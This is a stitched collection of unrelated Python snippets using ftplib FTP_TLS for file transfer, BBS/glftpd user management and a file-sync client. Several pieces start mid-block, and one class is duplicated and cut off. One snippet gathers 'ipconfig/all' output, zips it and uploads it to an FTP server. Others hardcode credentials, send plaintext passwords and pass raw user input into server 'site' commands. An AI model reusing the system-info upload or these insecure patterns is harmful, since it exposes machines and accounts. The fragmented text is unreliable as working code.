def sendPackagesFtp(): print "---- Send packages by FTP" global serverFtp global userFtp global passFtp from ftplib import FTP_TLS ftps = FTP_TLS(serverFtp) ftps.set_debuglevel(1) ftps.login(userFtp, passFtp) ftps.prot_p() try: ftps.sendcmd('MKD ' + '/files/' + strProductVer) except Exception: print 'Directory already exists' ftps.cwd('/files/' + strProductVer) filesListFtp = ftps.nlst() filesList = os.listdir(packagesPath) newFilesList = [e for e in filesList if not(e in filesListFtp)] for fileName in newFilesList: ftps.storbinary('STOR ' + fileName, open(packagesPath + '\\' + fileName, 'rb')) ftps.quit()
def downloadSarZIP(value, ftpParams): ftps = FTP_TLS() #ftps.set_debuglevel(2) ftps.connect(ftpParams.host) ftps.sendcmd('USER ' + ftpParams.user) ftps.sendcmd('PASS ' + ftpParams.password) list_of_files = [] checkFile = [] ftps.retrlines("NLST", list_of_files.append) # ...or use the existing helper # list_of_files = ftps.nlst() dest_dir = "./" # download files from ftp for name in list_of_files: if fnmatch.fnmatch(name, value + "_*"): checkFile.append(name) with open(os.path.join(dest_dir, name), "wb") as f: ftps.retrbinary("RETR {}".format(name), f.write) #delete files from ftp for name in list_of_files: if fnmatch.fnmatch(name, value + "_*"): ftps.delete(name) ftps.quit() return checkFile
def copy_ftp_file(project_id, client_name, file_name): # """ ftp file copy """ ftp = FTP_TLS(settings.FTP_LOCATION) ftp.sendcmd("USER {}".format(settings.FTP_USER)) ftp.sendcmd("PASS {}".format(settings.FTP_PASS)) comp_logger.info( 'Initiating ftp file transfer for file {} for client {}'.format( file_name, client_name)) ftp.cwd(client_name) # create project input dir project_dir = os.path.join(settings.PROJECT_DIR, str(project_id)) helper.create_dir(project_dir) # copy remote ftp file to local project folder file_format = file_name.split('.')[-1] local_filename = os.path.join(settings.PROJECT_INPUT_FOLDER, '{}.{}'.format(project_id, file_format)) if os.path.exists(local_filename): os.remove(local_filename) # project_input_dir = os.path.join(project_dir, settings.PROJECT_INPUT_FOLDER) # helper.create_dir(project_input_dir) # local_filename = os.path.join(project_input_dir, file_name) lf = open(local_filename, "wb") ftp.retrbinary("RETR " + file_name, lf.write, 8 * 1024) lf.close() comp_logger.info('Completed Copying file {} for client {}'.format( file_name, client_name))
def corrReportDL(exp_id, vgos_tag): year = '20' + str(vgos_tag[0:2]) tag = str(vgos_tag.rstrip()) exp_id = str(exp_id) vgos_exists = [] if os.path.isfile(dirname + "/corr_files/" + exp_id + '.corr'): print("Corr report already exists for experiment " + exp_id + ", skipping re-download.") return else: ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov') ftps.login() ftps.prot_p() try: ftps.retrlines( "LIST /pub/vlbi/ivsdata/vgosdb/" + year + "/" + tag + ".tgz", vgos_exists.append) if len(vgos_exists) > 0: local_filename = os.path.join(dirname, tag + ".tgz") ftps.sendcmd('TYPE I') lf = open(local_filename, "wb") ftps.retrbinary( "RETR /pub/vlbi/ivsdata/vgosdb/" + year + "/" + tag + ".tgz", lf.write) lf.close() tar = tarfile.open(dirname + '/' + tag + ".tgz") if tag + '/History/' + tag + '_V000_kMk4.hist' in tar.getnames( ): member = tar.getmember(tag + '/History/' + tag + '_V000_kMk4.hist') member.name = dirname + '/corr_files/' + exp_id + '.corr' tar.extract(member) tar.close() else: file_list = tar.getnames() regex = re.compile('.*V...\.hist') for file in file_list: if re.match(regex, file): member = tar.getmember(file) member.name = dirname + '/corr_files/' + exp_id + '.corr' tar.extract(member) tar.close() break os.remove(dirname + '/' + tag + ".tgz") print("Corr report download complete for experiment " + exp_id + ".") return except Exception: print("Corr report not available for experiment " + exp_id + ".") return
def _open_ftp(self): # type: () -> FTP """Open a new ftp object.""" _ftp = FTP_TLS() if self.tls else FTP() _ftp.set_debuglevel(0) with ftp_errors(self): _ftp.connect(self.host, self.port, self.timeout) _ftp.login(self.user, self.passwd, self.acct) try: _ftp.prot_p() # type: ignore except AttributeError: pass self._features = {} try: feat_response = _decode(_ftp.sendcmd("FEAT"), "latin-1") except error_perm: # pragma: no cover self.encoding = "latin-1" else: self._features = self._parse_features(feat_response) self.encoding = "utf-8" if "UTF8" in self._features else "latin-1" if not PY2: _ftp.file = _ftp.sock.makefile( # type: ignore "r", encoding=self.encoding) _ftp.encoding = self.encoding self._welcome = _ftp.welcome return _ftp
def login(self,debug=2,set_pasv=True): _old_makepasv = FTP_TLS.makepasv def _new_makepasv(self): host, port = _old_makepasv(self) host = self.sock.getpeername()[0] return host, port FTP_TLS.makepasv = _new_makepasv ftps = FTP_TLS(self.host) ftps.set_debuglevel(debug) ftps.auth() ftps.login(self.user,self.pwd) ftps.makepasv() ftps.sendcmd('pbsz 0') ftps.set_pasv(set_pasv) ftps.prot_p() print("hello ") ftps.getwelcome() return ftps
def connect(velkost_ftp,port): ftp=FTP_TLS(server,meno2,ps,port) ftp.prot_p() ftp.cwd(my_list[2]) print "Posielam subor. Cakajte prosim." obsah=open(file_to_send, 'rb') obsah.close() ftp.storbinary('STOR %s' % file_to_send, open(file_to_send, 'rb')) obsah.close() print "Subor odoslany [OK]" print "Obsah adresara na serveri:" ftp.retrlines("LIST") size_ftp=ftp.nlst() pocet=len(size_ftp) velkost_ftp_subor=size_ftp[pocet-1] #berie posledne pridany subor zo zoznamu ftp.sendcmd("TYPE i") velkost_ftp=ftp.size(velkost_ftp_subor) ftp.close() return velkost_ftp
def do_cmd(term): session = getsession() sep_ok = getattr(term, color_secondary)(u'::') sep_bad = getattr(term, color_primary)(u'::') colors = {'highlight': getattr(term, color_primary)} echo(u'\r\n\r\n i hope you know glftpd cmds :)' ) # feel free to change these echoes to personalize your installation echo(u'\r\n\r\n if you dont, type quit') echo( u'\r\n\r\n basically all this is good for at the moment is for msg and request' ) echo(u'\r\n\r\n e.g \'msg kniffy hi\' or \'request coolthing -for:<you>\'') for _ in range(max_attempts): echo(u'\r\n\r\n{sep} tYPE cMD -> '.format(sep=sep_ok)) handle = LineEditor(max_length, colors=colors).read() or u'' if handle.strip() == u'': continue # user says goodbye if handle.lower() in bye_u: return else: # do cmd person = session.user.handle # session.user.handle = person ftps = FTP_TLS() #ftps.set_debuglevel(2) # if you broke something, uncomment this (run it directly, not from eggdrop) ftps.connect( '127.0.0.1', '1234') # enter your server and port within the quotes ftps.login( 'cmd', '<make this a non-sysop user please>' ) # enter your user and pass within the quotes (remember, not a user with privs) # ftps.login(person, auth) ftps.prot_p() ftps.sendcmd('site ' + handle) echo(u'\r\n\r\n cmd sent') ftps.quit()
def recibir(self): file = self.request.files['file'] nombre = self.params['nombre'] descripcion = self.params['descripcion'] extension = file.filename.split('.') extension = extension[len(extension) - 1] archivo = self.generar_nombre_no_repetido(extension) file.save(os.path.join('/tmp/', archivo)) ftps = FTP_TLS() ftps.connect('192.168.1.26') ftps.sendcmd('USER ftp_user') ftps.sendcmd('PASS ftp_user') ftps.storbinary("STOR " + archivo, open('/tmp/' + archivo, 'rb')) id_generado = self.registrar_en_db(nombre, descripcion, archivo, extension) #ftps.retrlines('LIST') ftps.quit() return id_generado
def generar_nombre_no_repetido(self, extension): ftps = FTP_TLS() ftps.connect('192.168.1.26') ftps.sendcmd('USER ftp_user') ftps.sendcmd('PASS ftp_user') existe = False nombre_generado = '' while (existe == False): files = [] nombre_generado = self.random_word() + '.' + extension #print nombre_generado try: files = ftps.nlst() if nombre_generado not in files: existe = True except ftplib.error_perm, resp: if str(resp) == "550 No files found": print "No files in this directory" else: raise
def uploadToFtp(fileList, remoteDir, host, user, password): """ :type fileList: list :type remoteDir: basestring :type host: basestring :type user: basestring :type password: basestring """ ftps = FTP_TLS(host) ftps.sendcmd('USER %s' % user) ftps.sendcmd('PASS %s' % password) for fileItem in fileList: fileName = os.path.split(fileItem)[1] remoteFilePath = os.path.join(remoteDir, fileName) print('Uploading file [{0}] to ftp at [{1}]'.format(fileName, remoteFilePath)) ftps.storbinary('STOR {0}'.format(remoteFilePath), open(fileItem)) print('Done.') ftps.quit()
def delete_user(term, tgt_user, point): """ Delete given user. You may delete yourself. """ _color1, _color2 = [ getattr(term, _color) for _color in (color_lowlight, color_highlight) ] lb, rb, colon = _color1('['), _color1(']'), _color1(':') echo(term.move(*point)) echo(u'Delete {handle} {lb}yN{rb}{colon}{clear_eos} ?\b\b'.format( handle=_color2(tgt_user.handle), rb=rb, lb=lb, colon=colon, clear_eos=term.clear_eos)) inp = term.inkey() echo(inp + term.move(point.y + 2, point.x)) if inp == u'y': if tgt_user.handle != 'anonymous': ftps = FTP_TLS() ftps.connect('127.0.0.1', '1234') ftps.login('bbs', '<please make this a special sysop user in glftpd>') ftps.prot_p() # for ssl mode ftps.sendcmd('site deluser ' + tgt_user.handle) ftps.sendcmd('site msg sysop user ' + tgt_user.handle + ' deleted, maybe purge them too? ') ftps.quit() tgt_user.delete() echo(_color2('Deleted !')) time.sleep(1) return True echo(_color2('Canceled !')) time.sleep(1) return False
def main(handle=u''): """ Main procedure. """ # set syncterm font, if any term = getterminal() if term.kind == 'ansi': echo(syncterm_setfont(syncterm_font)) # reset handle to an empty string if it is any # of the 'new' user account alias strings if handle.lower() in new_usernames: handle = u'' user = User(handle) # create new user record for manipulation while True: display_banner(art_file, encoding=art_encoding) user, plaintext_password = do_nua(user) # user canceled. if user is None: return # confirm if prompt_yesno(question='Create account'): assert not find_user(user.handle), ( # prevent race condition, scenario: `billy' begins new account # process, waits at 'Create account [yn] ?' prompt until a # second `billy' finishes account creation process, then the # first `billy' enters 'y', overwriting the existing account. 'Security race condition: account already exists') # real_ip = getssession().addrport ftps = FTP_TLS() ftps.connect('127.0.0.1', '1234') # this can be remote ftps.login('asdf', '<please set up a glftpd user for this>') ftps.prot_p() ftps.sendcmd('site gadduser bbsuser ' + user.handle + ' ' + plaintext_password + ' *@127.0.0.1 ' ) ftps.sendcmd('site deluser ' + user.handle ) # for validation reasons ftps.sendcmd('site msg sysop ' + user.handle + ' added, please validate them ' ) ftps.quit() user.save() goto(top_script, user.handle)
class FtpService: def __init__(self, config: FtpConfiguration): self.config = config self.__connect() def __connect(self) -> None: if self.config.protocol == "FTP": self.ftp = FTP() elif self.config.protocol == "SFTP": self.ftp = FTP_TLS() else: raise UnknownFtpProtocolException(self.config.protocol) self.ftp.connect(host=self.config.host, port=self.config.port, timeout=10) resp: str = self.ftp.login(self.config.username, self.config.passwd) if resp.startswith("230"): logger.info("Successfully connect to FTP server") else: raise CannotConnectToFtpException(self.config) def read_file_items(self, path: str) -> List[FileItem]: files = list() items = list() self.ftp.cwd(path) self.ftp.dir(items.append) for item in items: name, is_file, size = self.__parse_list_line(item) if is_file: file_path = path + "/" + name mdt = self.ftp.sendcmd("MDTM " + file_path) dt = self.__parse_mdt(mdt) files.append(FileItem(file_path, dt, int(size))) return files def download_file(self, ftp_path: str, store_path: str) -> FileItem: a_store_path = pth.abspath(store_path) logger.info("Try download file from ftp \"%s\" to \"%s\"" % (ftp_path, a_store_path)) try: self.ftp.retrbinary("RETR " + ftp_path, open(a_store_path, 'wb').write) except Exception as ex: logger.error("Cannot download file", ex) raise ex return FileSystemHelper.read_file_item(a_store_path) def close(self): self.ftp.close() logger.info("Close ftp connection with server") @staticmethod def __parse_list_line(line: str) -> tuple: items = line.split() is_file = True if items[0].startswith("d"): is_file = False size = items[4] name = items[8:] return str.join(" ", name), is_file, size @staticmethod def __parse_mdt(mdt: str) -> datetime: items = mdt.split() dt = items[1] year = int(dt[0:4]) month = int(dt[4:6]) day = int(dt[6:8]) hour = int(dt[8:10]) minute = int(dt[10:12]) second = int(dt[12:14]) return datetime(year, month, day, hour, minute, second)
import os from zipfile import ZipFile from ftplib import FTP_TLS os.system("ipconfig/all>D:\mac.txt") with ZipFile("mac archive.zip","w") as newzip: newzip.write("D:\mac.txt") #Write your servername, username and password in quotes server = '' usern = '' passwd = '' file = open("mac archive.zip","rb") ftp = FTP_TLS() ftp.set_debuglevel(2) ftp.connect(server,21) ftp.sendcmd("USER "+str(usern)) ftp.sendcmd("PASS "+str(passwd)) ftp.storbinary("STOR "+"mac archive.zip",file) ftp.close
except all_errors as exception05: # Other exceptions. print(exception05) logging.warning(exception05) quit() # now download and compare each file in the JSON file for FTP_FILE_JSON in FTP_FILES_JSON: info_text = ">> Check the file " + FTP_FILE_JSON["path"] print(info_text) logging.info(info_text) # get modified date from the current ftp file: # thanks to: https://stackoverflow.com/questions/20049928/created-date-of-file-via-ftp modifiedTime = FTP_CLIENT.sendcmd('MDTM ' + FTP_FILE_JSON["path"]) CURRENT_MODIFIED_TIME = datetime.strptime( modifiedTime[4:], "%Y%m%d%H%M%S").strftime("%d %B %Y %H:%M:%S") # convert date to JSON object dictionary_new = {JSON_TAG_MODIFIED_TIME: CURRENT_MODIFIED_TIME} NEW_MODIFIED_TIME = json.loads(json.dumps(dictionary_new)) # time JSON file path CURRENT_LOCAL_PATH_MODIFIED_TIME = os.path.join( DIR_OF_DOWNLOADS, FTP_FILE_JSON["id"] + "_time" + ".json") # check if the last time save exists / is different to the current modified time if not os.path.exists(CURRENT_LOCAL_PATH_MODIFIED_TIME): # save date and file because it's the first time
class ServerWatcher(Watcher): downloadProgress = Signal((int, int,)) uploadProgress = Signal((int, int,)) # Si added: textStatus = Signal((str,)) fileEvent = Signal((str,)) fileEventCompleted = Signal() loginCompleted = Signal((bool, str,)) badFilenameFound = Signal((str,)) LOCATION = 'server' TEST_FILE = 'iqbox.test' def __init__(self, host, ssl, parent=None): """ Initializes parent class and attributes. Decides whether to use `FTP_TLS` or `FTP` based on the `ssl` param. :param host: Location of the FTP server :param ssl: Tells whether the FTP needs to support TLS or not :param parent: Reference to a `QObject` instance a parent """ super(ServerWatcher, self).__init__(parent) self.interval = 5000 self.localdir = '' self.deleteQueue = [] self.downloadQueue = [] self.uploadQueue = [] self.warnedNames = [] self.ftp = None self.useSSL = ssl self.host = host self.preemptiveCheck = False self.preemptiveActions = [] self.testFile = 'iqbox.test' @property def currentdir(self): """Returns the current working directory at the server""" return self.ftp.pwd() def setLocalDir(self, localdir): """ Sets the local directory used to stored all downloaded files. Creates the directory if needed. :param localdir: Absolute path to local directory """ self.localdir = localdir if not os.path.exists(self.localdir): os.makedirs(self.localdir) @pause_timer @Slot() def checkout(self): """ Recursively checks out all files on the server. Returns a dictionary of files on the server with their last modified date. :param download: Indicates whether or not the files should be downloaded """ # Check `self.deleteQueue`, `self.uploadQueue` and `self.downloadQueue` queues. # These tasks are done in queues to make sure all FTP commands # are done sequentially, in the same thread. self.deleteAll() self.uploadAll() self.downloadAll() # Handy list to keep track of the checkout process. # This list contain absolute paths only. checked_dirs = list() # Sets '/' as initial directory and initializes `downloading_dir` self.ftp.cwd('/') downloading_dir = self.currentdir check_date = dt.utcnow() sidirlist = list() root_cached = False fileC = 0 while True: # Gets the list of sub directories and files inside the # current directory `downloading_dir`. self.textStatus.emit('Remote scan- Downloading folder list of '+downloading_dir+'...') if root_cached and downloading_dir == '/': dir_subdirs = saved_root_dirs dirfiles = saved_root_files else: dir_subdirs = self.getDirs(downloading_dir) if downloading_dir == '/': saved_root_dirs = dir_subdirs # sidirlist.extend(dir_subdirs) self.textStatus.emit('Remote scan- Downloading files list of '+downloading_dir+'...') dirfiles = self.getFiles(downloading_dir) if downloading_dir == '/': saved_root_files = dirfiles root_cached = True # Leading '/' in `downloading_dir` breaks the `os.path.join` call localdir = os.path.join(self.localdir, downloading_dir[1:]) if not os.path.exists(localdir): # Creates the directory if it doesn't already exists. os.makedirs(localdir) for file_ in dirfiles: # `serverpath` is the absolute path of the file on the server, # download it only if it hasn't been already downloaded serverpath = os.path.join(downloading_dir, file_) serverpath = QDir.fromNativeSeparators(serverpath) server_file = File.fromPath(serverpath) self.textStatus.emit('Scanning remote file... '+serverpath+'...') # How do we know if we should check this server file? # We see if the date last checked is the check start time. if server_file.last_checked_server != check_date: # Do this process only once per file # Added by Simon # Give feedback on scanning of files. fileC += 1 if fileC % 1 == 2: self.textStatus.emit('Scanning remote files for changes, '+str(fileC)+' files scanned.') # STEP: IS THIS THE FIRST TIME WE SAW THE FILE, OR WAS IT ALREADY IN OUR DB? just_added = not server_file.inserver # STEP: IF ITS A NEW FILE, ENSURE WE DONT WANT TO SKIP IT # Example: If it's a temporary file, or a Unix file with a name we don't support. if just_added: filename = os.path.basename(serverpath) if platform.system() == 'Windows': badName = False for chr in ['\\', '/', ':', '?', '"', '<', '>', '|']: if chr in filename: badName = True break if badName: if filename not in self.warnedNames: self.warnedNames.append(filename) self.badFilenameFound.emit(filename) continue # STEP: ASSUMING THE FILE DID EXIST IN OUR DB, LETS SAVE THE LAST MODIFICATION DATE lastmdate = server_file.servermdate # STEP: SAVE THE MOD DATE TO A VARIABLE # Now we get the last mod time. # We expect this to work fine since this file # was found on the server servermdate = self.lastModified(serverpath) # STEP: SET BOOL SHOWING THAT IT WAS ON THE SERVER, SINCE WE KNOW IT IS. server_file.inserver = True # STEP: SET THE TIME THE FILE WAS LAST CHECKED TO THE SCAN START TIME server_file.last_checked_server = check_date # STEP: SET THE MOD DATE IN THE DATABASE TO THE ONE WE JUST GOT server_file.servermdate = servermdate # STEP: SAVE THIS CHANGE TO THE DATABASE server_file.session.commit() delta = 0 if server_file.inlocal: delta = server_file.timeDiff() # Emit the signals after the attributes has been set and committed if just_added is True: self.fileAdded.emit(ServerWatcher.LOCATION, serverpath) elif server_file.servermdate > lastmdate or delta < -Watcher.TOLERANCE: self.fileChanged.emit(ServerWatcher.LOCATION, serverpath, False) #END FOR self.textStatus.emit('Remote scan- Finding next folder...') dir_ready = True for dir_ in dir_subdirs: # `dirpath` is the absolute path of the subdirectory on the server, dirpath = QDir.fromNativeSeparators(os.path.join(downloading_dir, dir_)) # `downloading_dir` is ready only when all its subdirectory are on the # `checked_dirs` list. if dirpath not in checked_dirs: # Found one subdirectory that is not on `checked_dirs`, # will process it in the next iteration. downloading_dir = dirpath dir_ready = False break if dir_ready is True: # All subdirectories of `downloading_dir` are already in `checked_dirs` if downloading_dir == '/': # All directories ready and at '/', means checkout is complete # So, exit the main While loop!! break else: # Not at '/'. Current directory is ready so is appended to `checked_dirs` # Back one directory to find directories that are not in `checked_dirs` checked_dirs.append(downloading_dir) downloading_dir = os.path.dirname(downloading_dir) self.textStatus.emit('Remote scan- Found Folder...') ##### END OF WHILE ################ ################################################################### # Deleted files are the ones whose `last_checked_server` attribute # didn't get updated in the recursive run. session = Session() deleted = session.query(File).filter(File.last_checked_server < check_date).filter(File.inserver == True) for file_ in deleted: self.fileDeleted.emit(ServerWatcher.LOCATION, file_.path) # Wraps up the checkout process, commits to the database. session.commit() @Slot() def onLogin(self, username, passwd): ok = True msg = '' error_msg = 'Login failed.' try: if not self.ftp: self.ftp = FTP_TLS(self.host) if self.useSSL is True else FTP(self.host) loginResponse = self.ftp.login(username, passwd) except socket.gaierror: self.ftp = None ok = False msg = 'Server address could not be found.' except (error_perm, error_reply): info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) ok = False msg = error_msg else: if '230' in loginResponse: ok = True else: ok = False msg = error_msg if ok: # Logged in. Now let's do compability tests. if not self.testPermissions(): # User doesn't have write permissions, don't bother doing next test. ok = False msg = 'It seems like you do not have write access to this server.' else: # Permissions test passed, now let's test MFMT for timestamp modification. if not self.testMFMT(): ok = False msg = 'This server does not support timestamp modification\n \ need by this application.' self.loginCompleted.emit(ok, msg) def getFiles(self, path): """ This method simply wraps the `nlst` method with an exception handler, and returns an empty list in case an exception is caught. :param path: Relative or absolute path on the server """ try: nlst = self.ftp.nlst(path) dirs = self.getDirs(path) # Files are items in nlst that are not in dirs files = [item for item in nlst if os.path.basename(item) not in dirs] return files except: print 'Exception in ServerWatcher.getDirs' info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) return [] def getDirs(self, path): """ Retrieves a list of the directories inside `path`, uses `retrlines` and the LIST command to retrieve the items. :param path: Relative or absolute path on the server """ dirs = list() def handleLine(line): """ Recieves a line from the LIST command. This function is meant to be used as callback for the `retrlines` method. :params line: Line from the LIST command """ if line.startswith('d'): # Only lines starting with 'd' are directories # Parse the directory out of the line; lines look like: # 'drwxrwxrwx 1 user group 0 Jun 15 2012 dirname' dirname = line[55:].strip() if dirname != '.' and dirname != '..': # Ignoring '.' and '..' entries dirs.append(dirname) try: self.ftp.retrlines('LIST %s' % path, handleLine) return dirs except: print 'Exception in ServerWatcher.getDirs' info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) return [] @upload_test def testPermissions(self): # For interface purposes. upload_test takes care of everything. return True @upload_test def testMFMT(self): # Absurd date to test whether the change really happened. time = dt.utcfromtimestamp(100000000) try: self.setLastModified(self.testFile, time) otherTime = self.lastModified(self.testFile) diff = (time - otherTime).total_seconds() if abs(diff) < 2: # Let's give it a 2 seconds tolerance. mdtm = True else: mdtm = False except (ValueError, error_reply, error_perm): info = traceback.format_exception(*sys.exc_info()) for i in info: sys.stderr.write(i) mdtm = False return mdtm @Slot(str) def onDelete(self, filename): self.deleteQueue.append(filename) def deleteNext(self): if len(self.deleteQueue) > 0: next = self.deleteQueue.pop(0) self.deleteFile(next) def deleteAll(self): for filename in self.deleteQueue: self.deleteFile(filename) self.deleteQueue = [] @Slot(str) def deleteFile(self, filename): """ Deletes the file `filename` to the server :param filename: Absolute or relative path to the file """ try: print 'Deleting %s' % filename self.ftp.delete(filename) return True except (error_reply, error_perm): print 'Error deleting %s' % filename return False self.fileEventCompleted.emit() @Slot(str) def onDownload(self, filename): self.downloadQueue.append(filename) def downloadNext(self): if len(self.downloadQueue) > 0: next = self.downloadQueue.pop(0) self.downloadFile(next) def downloadAll(self): for filename in self.downloadQueue: self.downloadFile(filename) self.downloadQueue = [] @Slot(str, str) def downloadFile(self, filename, localpath=None): """ Performs a binary download to the file `filename` located on the server. `filename` parameter can be either absolute or relative, though it can fail for relative paths if the current directory is not appropiate. :param filename: Relative or absolute path to the file :param localpath: Absolute local path where the file will be saved """ def handleChunk(chunk): """ Receives chuncks of data downloaded from the server. This function is meant to be used as callback for the `retrbinary` method. :params chunk: Chunk of downloaded bytes to be written into the file """ # Simply writes the received data into the file `self.downloading` self.downloading.write(chunk) self.download_progress += len(chunk) self.downloadProgress.emit(self.download_size, self.download_progress) if localpath is None: localpath = self.localFromServer(filename) localdir = os.path.dirname(localpath) if not os.path.exists(localdir): # Creates the directory if it doesn't already exists. os.makedirs(localdir) print 'Downloading: %s to %s' % (filename, localpath) try: with open(localpath, 'wb') as f: # Opens the file at `localname` which will hold the downloaded file. # Object attributes regarding download status are updated accordingly. self.fileEvent.emit(filename) self.downloading = f self.download_progress = 0 self.download_size = int(self.ftp.sendcmd('SIZE %s' % filename).split(' ')[-1]) self.ftp.retrbinary('RETR %s' % filename, handleChunk) print 'Download finished' # Let's set the same modified time to that on the server. with File.fromPath(filename) as downloadedfile: mdate = LocalWatcher.lastModified(localpath) downloadedfile.localmdate = mdate downloadedfile.servermdate = mdate self.setLastModified(filename, mdate) downloaded = True except (IOError, OSError): downloaded = False self.ioError.emit(localpath) except (error_reply, error_perm) as ftperr: print 'Error downloading %s, %s' % (filename, ftperr) downloaded = False # TODO: Sometimes the file doesn't complete properly. # in that case we maybe shouldn't call this? self.fileEventCompleted.emit() return downloaded @Slot(str) def onUpload(self, filename): self.uploadQueue.append(filename) def uploadNext(self): if len(self.uploadQueue) > 0: next = self.uploadQueue.pop(0) self.uploadFile(next) def uploadAll(self): for filename in self.uploadQueue: self.uploadFile(filename) self.uploadQueue = [] @Slot(str) def uploadFile(self, filename): """ Uploads the file `filename` to the server, creating the needed directories. :param filename: Absolute or relative path to the file """ def handle(buf): """This function is meant to be used as callback for the `storbinary` method.""" self.upload_progress += 1024 self.uploadProgress.emit(self.upload_size, self.upload_progress) # Creates the directory where the file will be uploaded to self.mkpath(os.path.dirname(filename)) localpath = self.localFromServer(filename) print 'Uploading %s to %s' % (localpath, filename) try: # Uploads file and updates its modified date in the server # to match the date in the local filesystem. self.upload_progress = 0 self.upload_size = os.path.getsize(localpath) self.fileEvent.emit(localpath) self.ftp.storbinary('STOR %s' % filename, open(localpath, 'rb'), 1024, handle) print 'Upload finished' with File.fromPath(filename) as uploaded: modified = uploaded.localmdate uploaded.servermdate = modified self.setLastModified(filename, modified) uploaded = True except (IOError, OSError): uploaded = False self.ioError.emit(localpath) except (error_reply, error_perm, OSError) as err: print 'Error uploading %s, %s' % (filename, err) uploaded = False # TODO: Sometimes the file doesn't complete properly. # in that case we maybe shouldn't call this? self.fileEventCompleted.emit() return uploaded def lastModified(self, filename): """ Uses the MDTM FTP command to find the last modified timestamp of the file `filename`. Returns a `datetime.datetime` object in UTC representing the file's last modified date and time. :param filename: Relative or absolute path to the file """ timestamp = self.ftp.sendcmd('MDTM %s' % filename) if '213 ' not in timestamp: # Second chance was found to be needed in some cases. timestamp = self.ftp.sendcmd('MDTM %s' % filename) timestamp = timestamp.split(' ')[-1] dateformat = '%Y%m%d%H%M%S.%f' if '.' in timestamp else '%Y%m%d%H%M%S' try: mtime = dt.strptime(timestamp, dateformat) except ValueError: mtime = dt.utcnow() return mtime def setLastModified(self, serverpath, newtime): """ Uses the MFMT or MDTM FTP commands to set `newtime` as the modified timestamp of the file `serverpath` on the server. :param serverpath: Relative or absolute path to the file :param newtime: datedatime object holding the required time """ cmds = ['MFMT', 'MDTM'] for cmd in cmds: try: self.ftp.sendcmd( '%s %s %s' % (cmd, newtime.strftime('%Y%m%d%H%M%S'), serverpath)) return except (error_perm, error_reply) as e: if cmd == cmds[len(cmds) - 1]: # If is the last comand, re-raise the exception, else # keep trying. raise e else: continue def mkpath(self, path): """ Creates the path `path` on the server by recursively created folders, if needed. :param path: Absolute path on the server to be created """ try: self.ftp.cwd(path) except error_perm: # `cwd` call failed. Need to create some folders make_dir = '/' steps = path.split('/') for step in steps: if len(step) == 0: continue make_dir += '%s/' % step try: self.ftp.mkd(make_dir) except error_perm: # Probably already exists continue else: # `cwd` call succeed. No need to create # any folders self.ftp.cwd('/') return @Slot(str, str) def added(self, location, serverpath): super(ServerWatcher, self).added(location, serverpath) def actionFromPath(serverpath): f = File() fileExistsOnServer = True try: f.servermdate = self.lastModified(serverpath) except error_perm: fileExistsOnServer = False f.servermdate = 0 f.localmdate = LocalWatcher.lastModified(self.localFromServer(serverpath)) diff = f.timeDiff() action = None if abs(diff) > Watcher.TOLERANCE: if not fileExistsOnServer or diff > 0: action = FileAction(serverpath, FileAction.UPLOAD, ServerWatcher.LOCATION) else: action = FileAction(serverpath, FileAction.DOWNLOAD, LocalWatcher.LOCATION) return action if self.preemptiveCheck: if location == ServerWatcher.LOCATION: localpath = self.localFromServer(serverpath) if not os.path.exists(localpath): action = FileAction(serverpath, FileAction.DOWNLOAD, ServerWatcher.LOCATION) self.preemptiveActions.append(action) else: action = actionFromPath(serverpath) if action is not None: self.preemptiveActions.append(action) elif location == LocalWatcher.LOCATION: try: self.ftp.sendcmd('SIZE %s' % serverpath) except (error_reply, error_perm): exists = False else: exists = True if not exists: action = FileAction(serverpath, FileAction.UPLOAD, LocalWatcher.LOCATION) self.preemptiveActions.append(action) else: action = actionFromPath(serverpath) if action is not None: self.preemptiveActions.append(action) @Slot(str, str) def changed(self, location, serverpath): super(ServerWatcher, self).changed(location, serverpath) @Slot(str, str) def deleted(self, location, serverpath): super(ServerWatcher, self).deleted(location, serverpath) with File.fromPath(serverpath) as deleted: deleted.inserver = False
class ServerWatcher(Watcher): downloadProgress = Signal(( int, int, )) uploadProgress = Signal(( int, int, )) # Si added: textStatus = Signal((str, )) fileEvent = Signal((str, )) fileEventCompleted = Signal() loginCompleted = Signal(( bool, str, )) badFilenameFound = Signal((str, )) LOCATION = 'server' TEST_FILE = 'iqbox.test' def __init__(self, host, ssl, parent=None): """ Initializes parent class and attributes. Decides whether to use `FTP_TLS` or `FTP` based on the `ssl` param. :param host: Location of the FTP server :param ssl: Tells whether the FTP needs to support TLS or not :param parent: Reference to a `QObject` instance a parent """ super(ServerWatcher, self).__init__(parent) self.interval = 5000 self.localdir = '' self.deleteQueue = [] self.downloadQueue = [] self.uploadQueue = [] self.warnedNames = [] self.ftp = None self.useSSL = ssl self.host = host self.preemptiveCheck = False self.preemptiveActions = [] self.testFile = 'iqbox.test' @property def currentdir(self): """Returns the current working directory at the server""" return self.ftp.pwd() def setLocalDir(self, localdir): """ Sets the local directory used to stored all downloaded files. Creates the directory if needed. :param localdir: Absolute path to local directory """ self.localdir = localdir if not os.path.exists(self.localdir): os.makedirs(self.localdir) @pause_timer @Slot() def checkout(self): """ Recursively checks out all files on the server. Returns a dictionary of files on the server with their last modified date. :param download: Indicates whether or not the files should be downloaded """ # Check `self.deleteQueue`, `self.uploadQueue` and `self.downloadQueue` queues. # These tasks are done in queues to make sure all FTP commands # are done sequentially, in the same thread. self.deleteAll() self.uploadAll() self.downloadAll() # Handy list to keep track of the checkout process. # This list contain absolute paths only. checked_dirs = list() # Sets '/' as initial directory and initializes `downloading_dir` self.ftp.cwd('/') downloading_dir = self.currentdir check_date = dt.utcnow() sidirlist = list() root_cached = False fileC = 0 while True: # Gets the list of sub directories and files inside the # current directory `downloading_dir`. self.textStatus.emit('Remote scan- Downloading folder list of ' + downloading_dir + '...') if root_cached and downloading_dir == '/': dir_subdirs = saved_root_dirs dirfiles = saved_root_files else: dir_subdirs = self.getDirs(downloading_dir) if downloading_dir == '/': saved_root_dirs = dir_subdirs # sidirlist.extend(dir_subdirs) self.textStatus.emit( 'Remote scan- Downloading files list of ' + downloading_dir + '...') dirfiles = self.getFiles(downloading_dir) if downloading_dir == '/': saved_root_files = dirfiles root_cached = True # Leading '/' in `downloading_dir` breaks the `os.path.join` call localdir = os.path.join(self.localdir, downloading_dir[1:]) if not os.path.exists(localdir): # Creates the directory if it doesn't already exists. 